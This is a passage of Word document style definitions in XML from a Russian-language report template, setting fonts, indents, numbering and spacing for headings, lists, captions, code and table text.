  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00C53ADA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="567"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="810"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
        <w:tab w:val="left" w:pos="1701"/>
      </w:tabs>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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Title"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="0093477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aa">
    <w:name w:val="Название рисунка"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ab">
    <w:name w:val="Название таблицы"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0093477C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Программный код"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00B906D6"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ad">
    <w:name w:val="Текст внутри таблицы"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="32"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="21"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00384ECC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00384ECC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="Заголовок 8 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="Заголовок 9 Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="5"/>
    <w:semiHidden/>
    <w:rsid w:val="00F52F00"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="НИР нумерованный список"/>
    <w:basedOn w:val="a4"/>
    <w:locked/>
    <w:rsid w:val="002E373A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="НИР-простой список"/>
    <w:basedOn w:val="a4"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="32"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="005E4F2A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00AE243B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="284"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9912"/>
      </w:tabs>
      <w:spacing w:before="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="284" w:hanging="284"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="24">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00AE243B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="993"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9912"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="851" w:hanging="567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:locked/>
    <w:rsid w:val="00AE243B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1843"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9912"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1843" w:hanging="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00F67AC2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="Электронная подпись Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F67AC2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af1">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="33"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00F67AC2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="31"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="004B37E8"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="12">
    <w:name w:val="Светлая заливка1"/>
    <w:basedOn w:val="a6"/>
    <w:uiPriority w:val="60"/>
    <w:locked/>
    <w:rsid w:val="004B37E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2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00985035"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="af5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a6"/>
    <w:uiPriority w:val="59"/>
    <w:locked/>
    <w:rsid w:val="00475C3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6">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="aa"/>
    <w:qFormat/>
    <w:rsid w:val="00BE19C9"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00C5031D"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af9">
    <w:name w:val="Введение_заключение"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00F52F00"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af8">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C5031D"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="Список_ТИРЕ"/>
    <w:basedOn w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="Список_БУКВЫ"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a2">
    <w:name w:val="Список_ЦИФРЫ"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="Список_2_уровня"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a3">
    <w:name w:val="Список источников"/>
    <w:basedOn w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00384ECC"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="851"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afa">
    <w:name w:val="header"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="afb"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00D60F71"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afb">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="afa"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D60F71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afc">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00D60F71"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afd">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="afc"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D60F71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afe">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff">
    <w:name w:val="_Название рисунка"/>
    <w:basedOn w:val="aff0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b w:val="0"/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff1">
    <w:name w:val="_Рисунок"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="22">
    <w:name w:val="_Маркированный2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff0">
    <w:name w:val="caption"/>
    <w:aliases w:val="Вставленный объект"/>
    <w:basedOn w:val="a4"/>
    <w:next w:val="a4"/>
    <w:link w:val="aff2"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aff3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00917645"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff2">
    <w:name w:val="Название объекта Знак"/>
    <w:aliases w:val="Вставленный объект Знак"/>
    <w:link w:val="aff0"/>
    <w:uiPriority w:val="35"/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Основной текст Знак1"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="aff4"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
